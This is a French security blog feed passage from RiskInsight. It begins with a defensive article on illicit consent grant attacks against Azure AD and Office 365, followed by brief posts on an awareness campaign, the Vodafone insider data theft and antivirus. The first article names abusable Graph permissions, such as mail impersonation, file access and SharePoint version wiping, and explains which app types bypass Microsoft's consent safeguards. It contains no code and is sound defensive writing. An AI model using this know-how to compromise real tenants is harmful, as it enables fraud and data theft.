<p style="text-align: justify;"><img loading="lazy" decoding="async" class="aligncenter wp-image-20136 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Image3-2.png" alt="" width="3169" height="1701" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Image3-2.png 3169w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Image3-2-356x191.png 356w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Image3-2-71x39.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Image3-2-768x412.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Image3-2-1536x824.png 1536w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Image3-2-2048x1099.png 2048w" sizes="auto, (max-width: 3169px) 100vw, 3169px" /></p>
<p> </p>
<h1 style="text-align: justify;">Quelles sont les conséquences d’une telle attaque ?</h1>
<p style="text-align: justify;">Si certaines <strong>permissions nécessitent par défaut l’approbation d’un administrateur pour être déléguées</strong>, d’autres permissions peuvent être déléguées directement par les utilisateurs dans les environnements Azure non durcis. Les <strong>permissions pouvant être récupérées</strong> par l’attaquant lors de ce type d’attaque <strong>dépendent donc de la configuration du tenant Azure AD ciblé</strong>.</p>
<p style="text-align: justify;">Voici quelques exemples d’abus possibles par un attaquant qui aurait réussi à récupérer les permissions d’un utilisateur sur un environnement non durci.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-20140 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Image4-3.png" alt="" width="3083" height="1323" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Image4-3.png 3083w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Image4-3-437x188.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Image4-3-71x30.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Image4-3-768x330.png 768w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Image4-3-1536x659.png 1536w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Image4-3-2048x879.png 2048w" sizes="auto, (max-width: 3083px) 100vw, 3083px" /></p>
<p style="text-align: center;"><em>Actions réalisables à la suite d’une attaque par consentement illicite réussie sur en environnement Azure non durci</em></p>
<ul style="text-align: justify;">
<li><strong>Azure Active Directory :</strong>
<ul>
<li>La permission <span style="color: #048b9a;">Microsoft Graph User.ReadBasic.All</span> permet de <strong>récupérer les adresses email des tous les utilisateurs d’un tenant</strong>, ce qui permet de déployer des attaques de phishing à plus grande échelle à partir d’une première compromission.</li>
</ul>
</li>
<li><strong>Outlook :</strong>
<ul>
<li>L’envoi d’un email au nom d’un utilisateur peut permettre la réalisation d’attaques dites de « <strong>fraude au président </strong>» à l’aide des permissions <span style="color: #048b9a;">Microsoft Graph Mail.Send</span> et <span style="color: #048b9a;">Mail.ReadWrite</span>. Un employé compromis disposant d’un niveau hiérarchique élevé pourrait par exemple demander par email l’envoi en urgence d’une somme important d’argent à un compte non répertorié par l’entreprise.</li>
<li>Les emails envoyés peuvent également être dissimulés à l’aide de <strong>règles de filtrage Outlook</strong> pouvant être modifiées à l’aide de la permission <span style="color: #048b9a;">MailboxSettings.ReadWrite</span>. L’attaquant pourra alors <strong>rediriger tous les emails</strong> liés à son attaque et les réponses associées vers un dossier différent des boites d’envoi et de réception.</li>
</ul>
</li>
<li><strong>Teams :</strong>
<ul>
<li>La <strong>lecture et l’envoi de messages</strong> via Teams (<span style="color: #048b9a;">Microsoft Graph Chat.ReadWrite</span>) est une méthode efficace pour un attaquant d’usurper l’identité d’un utilisateur. Cette méthode peut également être utilisée pour réaliser des attaques de « <strong>fraude au président </strong>».</li>
</ul>
</li>
<li><strong>OneDrive et SharePoint :</strong>
<ul>
<li>L’accès en lecture aux <strong>fichiers accessibles sur OneDrive et SharePoint</strong> (<span style="color: #048b9a;">Microsoft Graph Files.Read.All</span>) peut donner accès à l’ensemble des fichiers accessibles par l’utilisateur. De plus, les droits d’accès aux fichiers SharePoint sont souvent<strong> stockés avec des droits d’accès permissifs</strong> ce qui permet aux attaquants de récupérer un très grand nombre de <strong>fichiers</strong>. Il n’est pas rare par exemple d’avoir à accès à des scripts ou fichiers de configurations contenant des mots de passe en clair.</li>
<li>Par ailleurs, les fonctionnalités de recherche de SharePoint, permettant notamment la lecture et l’indexation du contenu des fichiers Office, peuvent être utilisées afin de cibler certains mots clés tels que « mot de passe ».</li>
<li>Les droits d’écriture sur un fichier SharePoint (<span style="color: #048b9a;">Microsoft Graph Files.ReadWrite.All</span>) peuvent également avoir un impact important : les fonctionnalités de versioning de SharePoint limitent par défaut l’enregistrement des anciennes versions des fichiers à 100 versions. Cela signifie qu’en cas de réécritures automatisées et successives plus de 100 fois, <strong>la version initiale du fichier ne serait plus récupérable</strong>. Cela permettrait donc à un attaquant d’<strong>effacer un grand nombre de données</strong> en cas de compromission d’un compte disposant de droits d’écriture sur des fichiers sensibles. En cas d’effacement, il faudrait alors contacter le support Microsoft pour tenter de récupérer les données sur les sauvegardes quotidiennes à froid.</li>
</ul>
</li>
<li><strong>OneNote :</strong>
<ul>
<li>Les fichiers OneNote synchronisés (<span style="color: #048b9a;">Microsoft Graph Notes.ReadWrite</span> ou <span style="color: #048b9a;">Read.All</span>) peuvent contenir des informations sensibles tels que des <strong>comptes-rendus de réunion, confidentielles, mais aussi des informations techniques</strong> telles que des mots de passes stockés de manière non sécurisée.</li>
</ul>
</li>
<li><strong>Ressources Azure </strong>:
<ul>
<li>L’accès aux <em>key vaults</em> et <em>storage accounts</em> (<span style="color: #048b9a;">Azure Key Vault</span> et <span style="color: #048b9a;">Azure Storage user_impersonation</span>) peuvent donner accès à des éléments sensibles <strong>en cas de compromission de comptes de développeurs</strong> ou d’utilisateurs techniques. Ces éléments peuvent <strong>faciliter la compromission de ressources Azure</strong> telles que des machines virtuelles et servir de <strong>point de rebond pour un attaquant externe</strong>.</li>
</ul>
</li>
</ul>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;">Ces actions peuvent avoir de <strong>graves impacts</strong> pour une entreprise. Par ailleurs, elles peuvent <strong>faciliter la réalisation d’attaques plus élaborées</strong> en divulguant des informations sensibles à un attaquant externe.</p>
<p style="text-align: justify;"><strong>En cas d’approbation par un administrateur,</strong> des permissions plus sensibles peuvent être récupérées comme l’accès en écriture à <strong>l’ensemble des informations de l’annuaire Azure Active Directory</strong>.</p>
<p style="text-align: justify;">Enfin, les administrateurs disposent du <strong>droit de déléguer à une application les permissions de tous les utilisateurs</strong> du tenant. Dans cette éventualité, l’identité de l’ensemble des utilisateurs pourraient être usurpée pour la permission déléguée.</p>
<p style="text-align: justify;"> </p>
<h1 style="text-align: justify;">La mise en place par Microsoft du « risk-based consent step up » pour limiter les attaques par consentement illicite</h1>
<p style="text-align: justify;">Face à cette menace <strong>Microsoft a implémenté en novembre 2020</strong> des protections supplémentaires pour limiter l’impact de ce type d’attaques. La fonctionnalité de « <strong>risk-based consent step up</strong> » a pour objectif de <strong>lever un avertissement</strong> et de demander <strong>la validation d’un administrateur</strong> en cas de <strong>demande</strong> de permission <strong>semblant frauduleuse</strong>.</p>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-20146 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Imageter.png" alt="" width="397" height="412" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Imageter.png 397w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Imageter-184x191.png 184w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Imageter-38x39.png 38w" sizes="auto, (max-width: 397px) 100vw, 397px" /></p>
<p style="text-align: center;"><em>La demande d’accès depuis une application non vérifiée de droits considérés comme sensible est bloquée par défaut</em></p>
<p style="text-align: justify;">Celle-ci s’applique dans le cas d’une <strong>demande de permissions par une application non vérifiée crée hors du tenant ciblée</strong>. Par défaut, toutes les permissions sont concernées, à l’exception de la lecture du profil de l’utilisateur cible, pour faciliter l’authentification unique (SSO) avec des applications tierces.</p>
<p style="text-align: justify;">Cette restriction est <strong>implémentée par défaut</strong> sur tous les tenants Azure.</p>
<p style="text-align: justify;">Si <strong>ces restrictions permettent de limiter les attaques</strong>, 3 types d’applications sont <strong>cependant toujours utilisables à des fins malveillantes</strong><em> :</em> les applications « legacy », les applications internes au tenant ciblé et les applications vérifiées.</p>
<ul style="text-align: justify;">
<li><strong>Applications « legacy » :</strong>
<ul>
<li>Afin de permettre une <strong>rétrocompatibilité, aucun message d’avertissement n’est affiché </strong>pour une demande de permissions provenant d’une <strong>application créée avant novembre 2020</strong>.</li>
<li><em>Prérequis pour l’attaquant</em><strong> :</strong> disposer d’une <strong>application créée sur un tenant Azure avant novembre 2020</strong> ou compromettre un tenant contenant de telles applications.</li>
</ul>
</li>
<li><strong>Applications internes au tenant ciblé :</strong>
<ul>
<li>Ces applications <strong>ne sont pas couvertes par le « risk based consent step up »</strong><em>.</em> Par défaut, tous les utilisateurs d’un tenant Azure disposent du droit de <strong>création d’une application d’entreprise sur leur tenant</strong> ce qui facilite la réalisation de l’attaque sur un environnement non durci.</li>
<li><em>Prérequis pour l’attaquant </em>: disposer d’un premier compte compromis sur le SI de l’entreprise ciblée, s’apercevoir que la création des applications est autorisée pour les utilisateurs standards et <strong>déployer une application interne au tenant.</strong></li>
</ul>
</li>
<li><strong>Applications vérifiées :</strong>
<ul>
<li>Les applications vérifiées ne sont pas couvertes par le « risk based consent step up ». La procédure de vérification de Microsoft nécessite d’intégrer le Microsoft Partner Network.</li>
<li><em>Prérequis pour l’attaquant</em><strong> :</strong> disposer d’une <strong>application vérifiée</strong> ou <strong>compromettre un tenant Azure disposant d’applications vérifiées</strong> et détourner l’utilisation de ces applications légitimes.</li>
</ul>
</li>
</ul>
<p style="text-align: justify;"> </p>
<h1 style="text-align: justify;">Remédiations possibles</h1>
<p style="text-align: justify;">Afin de limiter la probabilité et l’impact de telles attaques, les recommandations suivantes peuvent être <strong>appliquées et adaptées au contexte de l’entreprise :</strong></p>
<ul style="text-align: justify;">
<li>Autoriser <strong>uniquement les applications explicitement approuvées par les administrateurs</strong>. Cette configuration est la plus sécurisée, mais l’étape de validation peut constituer un goulot d’étranglement puisque ce sont généralement les Global Administrators et Privileged Role Administrators qui doivent faire la validation. En pratique, certains droits peuvent être aussi délégués via les Cloud Application Administrators ou les Application Administrators.</li>
</ul>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-20149 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Imagequa.png" alt="" width="1392" height="522" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Imagequa.png 1392w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Imagequa-437x164.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Imagequa-71x27.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Imagequa-768x288.png 768w" sizes="auto, (max-width: 1392px) 100vw, 1392px" /></p>
<p style="text-align: center;"><em>Le consentement de délégation de privilèges par les utilisateurs standards peut être bloqué via les configurations Azure AD</em></p>
<ul style="text-align: justify;">
<li><strong>Limiter les permissions pour lesquelles les délégations peuvent être réalisées</strong>. Un administrateur peut spécifier les permissions à faible risque (Low) pour lesquelles les délégations peuvent être directement faites par les utilisateurs.</li>
</ul>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-20151 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Imagecin.png" alt="" width="949" height="361" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Imagecin.png 949w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Imagecin-437x166.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Imagecin-71x27.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Imagecin-768x292.png 768w" sizes="auto, (max-width: 949px) 100vw, 949px" /></p>
<p style="text-align: center;"><em>Le consentement de délégation de privilèges par les utilisateurs standards peut être limité aux droits considérés non sensibles via les configurations Azure AD</em></p>
<ul style="text-align: justify;">
<li>Créer un <strong>processus de validation des applications légitimes et de admin consent workflow pour tracer et justifier ces validations</strong>. En durcissant les modalités d’octroi de consentements, il est nécessaire de conjointement mettre en place un manière simple et intuitive pour les utilisateurs de demander des dérogations pour déléguer des permissions liées à des cas d’usage légitimes. Ces exceptions doivent être tracées et justifiées afin de s’assurer de la légitimité des demandes.</li>
<li>Faire une <strong>revue régulière des droits délégués aux applications</strong> (<span style="color: #048b9a;">Entreprise applications</span>) : les permissions déléguées par les utilisateurs doivent être revues afin de s’assurer que seules des applications légitimes disposent de droits sur les ressources Office 365 du tenant.</li>
</ul>
<p><img loading="lazy" decoding="async" class="aligncenter wp-image-20153 size-full" src="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Imagesext.png" alt="" width="1392" height="389" srcset="https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Imagesext.png 1392w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Imagesext-437x122.png 437w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Imagesext-71x20.png 71w, https://www.riskinsight-wavestone.com/wp-content/uploads/2023/03/Imagesext-768x215.png 768w" sizes="auto, (max-width: 1392px) 100vw, 1392px" /></p>
<p style="text-align: center;"><em>La revue régulière des applications disposant de droits sur un tenant Azure permet de valider que les privilèges octroyés sont toujours d’actualité</em></p>
<ul style="text-align: justify;">
<li>Superviser les accès suspects aux ressources Office 365. Il est possible par exemple de mettre en place des <strong>règles d&rsquo;alerte</strong> sur le nombre de fichiers téléchargés sur un temps court afin d’identifier les <strong>tentatives d’exfiltration de données</strong>.</li>
<li><strong>Limiter les droits d’accès aux fichiers SharePoint au strict nécessaire</strong>: les fichiers accessibles à tous les utilisateurs d’un tenant doivent être vérifiés à intervalle régulier et les droits d’accès aux fichiers les plus sensibles doivent être revus pour s’assurer que seules les personnes nécessaires y ont accès.</li>
</ul>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;"> </p>
<h1 style="text-align: justify;">Conclusion</h1>
<p style="text-align: justify;">Les <strong>différentes attaques par phishing</strong> présentées dans cet article reposent sur un <strong>manque de durcissement des configurations Azure AD</strong>. La <strong>mise en place d’un second facteur d’authentification</strong>, bien que nécessaire face aux attaques par phishing traditionnelles, n’est pas suffisante pour se prémunir des autres attaques présentées. Pour les attaques via l’authentification « device code », les administrateurs peuvent <strong>mettre en place des politiques d’accès conditionnel</strong> pour limiter les connexions suspicieuses provenant d’appareil non maitrisés par l’entreprise. Pour les attaques par consentement illicite, la mesure la plus efficace consiste à <strong>autoriser uniquement les applications approuvées par les administrateurs.</strong></p>
<p style="text-align: justify;"><strong>Ces trois éléments de durcissement,</strong> bien que simples en apparence, peuvent faire l’objet de <strong>véritables chantiers de sécurisation</strong> afin de <strong>prendre en compte l’historique,</strong> notamment en s’assurant que les applications existantes ne soient pas bloquées par ces mesures, et en <strong>implémentant des processus </strong>de revues régulières et de validation des nouvelles applications.</p>
<p style="text-align: justify;"> </p>
<p style="text-align: justify;"> </p>
<h3 style="text-align: justify;">Bibliographie</h3>
<p style="text-align: justify;"><a href="https://aadinternals.com/post/phishing/">https://aadinternals.com/post/phishing/</a></p>
<p style="text-align: justify;"><a href="https://jeffreyappel.nl/protect-against-oauth-consent-phishing-attempts-illicit-consent-attack/">https://jeffreyappel.nl/protect-against-oauth-consent-phishing-attempts-illicit-consent-attack/</a></p>
<p style="text-align: justify;"><a href="https://positivethinking.tech/insights/what-is-an-illicit-consent-grant-attack-in-office-365/">https://positivethinking.tech/insights/what-is-an-illicit-consent-grant-attack-in-office-365/</a></p>
<p style="text-align: justify;"><a href="https://docs.microsoft.com/en-us/azure/active-directory/develop/publisher-verification-overview">https://docs.microsoft.com/en-us/azure/active-directory/develop/publisher-verification-overview</a></p>
<p style="text-align: justify;"><a href="https://learn.microsoft.com/en-us/azure/active-directory/manage-apps/user-admin-consent-overview">https://learn.microsoft.com/en-us/azure/active-directory/manage-apps/user-admin-consent-overview</a></p>
<p style="text-align: justify;"><a href="https://learn.microsoft.com/en-us/security/operations/incident-response-playbook-app-consent">https://learn.microsoft.com/en-us/security/operations/incident-response-playbook-app-consent</a></p>
<p style="text-align: justify;"><a href="https://www.microsoft.com/en-us/security/blog/2021/07/14/microsoft-delivers-comprehensive-solution-to-battle-rise-in-consent-phishing-emails/">https://www.microsoft.com/en-us/security/blog/2021/07/14/microsoft-delivers-comprehensive-solution-to-battle-rise-in-consent-phishing-emails</a></p>
<p style="text-align: justify;"><a href="#_ftnref1" name="_ftn1">[1]</a> <a href="https://learn.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-device-code">https://learn.microsoft.com/en-us/azure/active-directory/develop/v2-oauth2-device-code</a></p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2023/03/les-attaques-par-consentement-illicite-ciblant-azure-et-office-365-une-menace-toujours-dactualite/">Les attaques par consentement illicite ciblant Azure et Office 365 : une menace toujours d’actualité ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
					<wfw:commentRss>https://www.riskinsight-wavestone.com/2023/03/les-attaques-par-consentement-illicite-ciblant-azure-et-office-365-une-menace-toujours-dactualite/feed/</wfw:commentRss>
			<slash:comments>0</slash:comments>
		
		
			</item>
		<item>
		<title>La Hack Academy, première campagne nationale de sensibilisation à la cybersécurité</title>
		<link>https://www.riskinsight-wavestone.com/2015/10/la-hack-academy-premiere-campagne-nationale-de-sensibilisation-a-la-cybersecurite/</link>
		
		<dc:creator><![CDATA[SopHi8Then0t]]></dc:creator>
		<pubDate>Wed, 07 Oct 2015 11:16:56 +0000</pubDate>
				<category><![CDATA[Cyberrisk Management & Strategy]]></category>
		<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[cyberawareness]]></category>
		<category><![CDATA[Hack Academy]]></category>
		<category><![CDATA[hackers]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[sensibilisation]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=8354</guid>

					<description><![CDATA[<p>A l&#8217;occasion du « mois Européen de la cybersécurité », le CIGREF (Club Informatique des Grandes Entreprises Françaises) a lancé le 1er Octobre, une vaste campagne grand public de sensibilisation pour valoriser les bonnes pratiques informatiques et contribuer à une meilleure connaissance...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2015/10/la-hack-academy-premiere-campagne-nationale-de-sensibilisation-a-la-cybersecurite/">La Hack Academy, première campagne nationale de sensibilisation à la cybersécurité</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p><em>A l&rsquo;occasion du « mois Européen de la cybersécurité », le CIGREF (Club Informatique des Grandes Entreprises Françaises) a lancé le 1er Octobre, une vaste campagne grand public de sensibilisation pour valoriser les bonnes pratiques informatiques et contribuer à une meilleure connaissance des risques sur Internet. Conscient de l&rsquo;importance de cette démarche, le cabinet Solucom s&rsquo;est associé à cette opération d&rsquo;envergure nationale.</em></p>
<h2>Un message à faire passer « Sur Internet, je reste en alerte »</h2>
<p>Alors que les menaces se multiplient concernant aussi bien les entreprises que les citoyens, cette opération ludique et décalée a pour objectif de montrer qu&rsquo;il est possible de lutter contre le piratage en adoptant les bons réflexes.</p>
<p>Conçue par l&rsquo;agence W, cette campagne de sensibilisation se décline au travers du site internet <a href="http://www.hack-academy.fr/" target="_blank" rel="noopener noreferrer">www.hack-academy.fr</a>. Le CIGREF a choisi de se servir des codes qui parlent à tout le monde, ceux de la télé-réalité pour faire passer des messages et élever le niveau de conscience.</p>
<h2>Qui sera le hacker de demain ?</h2>
<p>Les quatre vidéos publiées sur le site mettent en scène des jeunes candidats révélant leurs talents de pirate informatique devant un jury de professionnels de la « Hack Academy » dont l&rsquo;objectif est de découvrir les hackers de demain.</p>
<p>Les candidats Jeny, Dimitri, Martin et Willy s&rsquo;attaquent aux principales attaques auxquelles les internautes peuvent être confrontés. Ils abordent avec humour le phishing, le piratage de mot de passe ou encore le cheval de Troie.</p>
<p>En plus des vidéos, le site hack-academy.fr propose également de défier chacun des candidats au travers d&rsquo;un quizz encore une fois basé sur l&rsquo;humour et la pédagogie.</p>
<figure id="post-8367 media-8367" class="align-none"><img decoding="async" src="http://www.solucominsight.fr/wp-content/uploads/2015/10/quizz.png" alt="" /></figure>
<p>Le site permet également d’accéder à des fiches pratiques sur les différents types d&rsquo;attaques et les façons de se protéger.</p>
<figure id="post-8365 media-8365" class="align-none"><img decoding="async" src="http://www.solucominsight.fr/wp-content/uploads/2015/10/contenu.png" alt="" /></figure>
<p>Pour <strong>Jean-Paul Mazoyer</strong>, Président du cercle Cybersécurité du CIGREF : « <em>Grâce à l’efficacité des campagnes grand-public par exemple sur l’alcool au volant ou la ceinture de sécurité, nous nous sentons maintenant concernés par ces questions… Hack-academy  sera la première campagne touchant la cybersécurité ! L’histoire du premier geste qui protège les données sur Internet ne fait que commencer</em> »</p>
<p><strong>Découvrez Willy, le spécialiste du phishing, selon lui « <em>Avec un simple mail et une photo on peut berner n’importe qui … </em>»</strong></p>
<p><iframe loading="lazy" src="https://www.youtube.com/embed/2OTdWaTlUBo" width="560" height="315" frameborder="0" allowfullscreen="allowfullscreen"></iframe></p>
<p>Et pour voir toutes les vidéos, rendez-vous sur : <a href="http://www.hack-academy.fr">www.hack-academy.fr</a></p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2015/10/la-hack-academy-premiere-campagne-nationale-de-sensibilisation-a-la-cybersecurite/">La Hack Academy, première campagne nationale de sensibilisation à la cybersécurité</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Vol de données chez Vodafone : un rappel douloureux de la «&#160;menace intérieure&#160;»</title>
		<link>https://www.riskinsight-wavestone.com/2013/10/vol-de-donnees-chez-vodafone-un-rappel-douloureux-de-la-menace-interieure/</link>
		
		<dc:creator><![CDATA[Gérôme Billois]]></dc:creator>
		<pubDate>Fri, 11 Oct 2013 16:03:56 +0000</pubDate>
				<category><![CDATA[Cyberrisk Management & Strategy]]></category>
		<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[Métiers - Telcos]]></category>
		<category><![CDATA[cyberassurance]]></category>
		<category><![CDATA[Cybercriminalité]]></category>
		<category><![CDATA[DPO]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[Risk management]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=4350</guid>

					<description><![CDATA[<p>A l’heure où la cybercriminalité sur internet défraie régulièrement la chronique, l’incident de Vodafone nous rappelle que les incidents de sécurité peuvent également provenir de l’intérieur de l’entreprise. Une attaque motivée par la perspective de gains financiers L’enquête semble converger...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2013/10/vol-de-donnees-chez-vodafone-un-rappel-douloureux-de-la-menace-interieure/">Vol de données chez Vodafone : un rappel douloureux de la «&nbsp;menace intérieure&nbsp;»</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>A l’heure où la cybercriminalité sur internet défraie régulièrement la chronique, l’incident de Vodafone nous rappelle que les incidents de sécurité peuvent également provenir de l’intérieur de l’entreprise.</p>
<h2>Une attaque motivée par la perspective de gains financiers</h2>
<p>L’enquête semble converger vers un prestataire de l’opérateur qui aurait réalisé le vol de données. Ce dernier a déjà été interpellé par les forces de l’ordre, preuve pour les plus sceptiques, de l’efficacité aujourd’hui des autorités sur ces dossiers d’attaques informatiques. Nous en saurons certainement plus dans les jours qui viennent sur ses motivations, mais la recherche de gains financiers ne doit pas être négligée. Aujourd’hui, un « enregistrement client » (nom, prénom, adresse…) peut se monnayer autour de 15 centimes de dollars, ce qui représente quand même plus 300 000 euros dans le cas de Vodafone.</p>
<p>En effet, plus de deux millions de données clients ont été dérobées, dont certaines informations bancaires. Ces données pourront servir à réaliser des attaques en <em>phishing</em> de « haute qualité », capables de tromper plus facilement les destinataires grâce à des informations fiables. Heureusement, les enregistrements les plus sensibles (numéro de carte, mot de passe…) semblent avoir été épargnés. Dans le cas contraire,  l’impact aurait pu être bien plus important : des fraudes financières auraient pu être réalisées directement.</p>
<h2> Prestataires et administrateurs : des populations à encadrer</h2>
<p>Cet incident met à nouveau en lumière la faille majeure que représentent les fonctions d’administrations du SI. Sans préjuger de la situation de Vodafone, ces fonctions sont souvent externalisées à moindre coût dans des méga-contrats dont les contours sont toujours difficiles à cerner (qualification des employés, sous-traitance masquée, pays concernés…) et dont les mesures de sécurité censés encadrer les usages sont rarement vérifiées sur le terrain. Et cette situation se rencontre malheureusement dans de nombreux secteurs, même les plus sensibles. N’oublions pas qu’Edward Snowden, administrateur sous-traitant, nous dévoile régulièrement depuis le début de l’été des documents secrets de la NSA…</p>
<h2>Des changements à entamer à la DSI et à la direction des achats dès aujourd’hui pour limiter les risques</h2>
<p>Vodafone vient de voir son image écornée et les coûts de gestion de l’incident risquent d’être élevés. Au-delà des coûts directs liés aux investigations, le volet notification des clients peut être majeur. Les chiffres en provenance des États-Unis parlent d’un coût autour de 100€ par clients à notifier, nous sommes dans une fourchette rapidement supérieures à la centaine de millions d’euros.</p>
<p>Dans cette situation, et pour limiter les impacts, un contrat de cyber assurance peut être utile, mais attention il ne doit pas contenir d’exclusion sur les malveillances internes.</p>
<p>Au-delà de cette mesure de compensation, il est bien évidemment nécessaire de vérifier sur les périmètres les plus sensibles de l’entreprise, la qualité et la sécurité des processus d’administration. Il s’agit d’un chantier d’ampleur, qui au-delà de la mise en place de mesures techniques (mise en place de plateforme de rebond, journalisation des actions, limitations des comptes d’administration, utilisation de postes de travail dédiés non connectés à Internet…) est avant tout un projet de conduite du changement. Un changement à mener à deux niveaux, auprès de populations de la DSI souvent très (voir trop) autonomes dans la réalisation de leurs actions au quotidien qui doivent accepter la mise en place de mesure de sécurité et de contrôle, mais aussi et peut être surtout au niveau de la direction des achats pour valoriser les fonctions d’administration du SI et faire de la sécurité un des critères de premiers plans dans les contrats d’externalisation.</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2013/10/vol-de-donnees-chez-vodafone-un-rappel-douloureux-de-la-menace-interieure/">Vol de données chez Vodafone : un rappel douloureux de la «&nbsp;menace intérieure&nbsp;»</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Un antivirus sur votre PC entreprise en 2013 ? Pour quoi faire ?</title>
		<link>https://www.riskinsight-wavestone.com/2013/05/un-antivirus-sur-votre-pc-entreprise-en-2013-pour-quoi-faire/</link>
		
		<dc:creator><![CDATA[Chadi Hantouche]]></dc:creator>
		<pubDate>Wed, 22 May 2013 11:51:38 +0000</pubDate>
				<category><![CDATA[Cloud & Next-Gen IT Security]]></category>
		<category><![CDATA[Cybersecurity & Digital Trust]]></category>
		<category><![CDATA[antivirus]]></category>
		<category><![CDATA[malware]]></category>
		<category><![CDATA[phishing]]></category>
		<category><![CDATA[poste de travail]]></category>
		<category><![CDATA[security architecture]]></category>
		<guid isPermaLink="false">http://www.solucominsight.fr/?p=3752</guid>

					<description><![CDATA[<p>Voilà plusieurs années qu’aucune épidémie virale majeure n’a eu lieu. À  l’heure des attaques ciblées, des dénis de service ou encore des piratages complexes de réseaux industriels, de plus en plus de voix  remettent en cause la pertinence de disposer...</p>
<p>Cet article <a href="https://www.riskinsight-wavestone.com/2013/05/un-antivirus-sur-votre-pc-entreprise-en-2013-pour-quoi-faire/">Un antivirus sur votre PC entreprise en 2013 ? Pour quoi faire ?</a> est apparu en premier sur <a href="https://www.riskinsight-wavestone.com">RiskInsight</a>.</p>
]]></description>
										<content:encoded><![CDATA[<p>Voilà plusieurs années qu’aucune épidémie virale majeure n’a eu lieu. À  l’heure des attaques ciblées, des dénis de service ou encore des piratages complexes de réseaux industriels, de plus en plus de voix  remettent en cause la pertinence de disposer d’un antivirus sur le poste de travail.</p>
<p>Certes, les attaques évoluent, exploitant de plus en plus des vulnérabilités non dévoilées (type 0-days), ou faisant appel à des méthodes de phishing avancées contre lesquels les antivirus paraissent bien impuissants.</p>
<p>Même s’ils sont aujourd’hui loin d’être suffisants, leur utilité est pourtant toujours réelle.</p>
<h2> <strong>De l’antivirus au client unique de sécurité, les éditeurs ont fait évoluer leur offre</strong></h2>
<p>L’outil désigné par « antivirus » couvre en fait, dans la majorité des cas, plusieurs fonctions : antivirus (et de manière plus générale, antimalware), mais aussi pare-feu personnel, Host IPS (HIPS), outil de contrôle des ports USB…</p>
<p>C’est ce que l’on appelle le « client unique de sécurité » sur le poste de travail.</p>
<p>Il constitue aujourd’hui un rempart évident contre les infections, en particulier celles qui sont involontaires (clé USB infectée) ou récurrentes (virus anciens qui réapparaissent ponctuellement).</p>
<p>L’expérience des nombreux audits menés par Solucom montre qu’il protège parfois aussi contre des attaques plus complexes. Il peut par exemple détecter l’ exploitation d’une vulnérabilité pour laquelle le système n’aurait pas reçu le correctif, de type Conficker.</p>
<p>Il suffit d’ailleurs de se connecter à une console antivirus d’entreprise pour s’en convaincre : les détections/suppressions de virus sont encore nombreuses et régulières. En particulier, on constate souvent un pic lors des fameux scans hebdomadaires, souvent décriés par les utilisateurs pour les ralentissements qu’ils provoquent sur les postes (et leur manque d’efficacité supposé).</p>
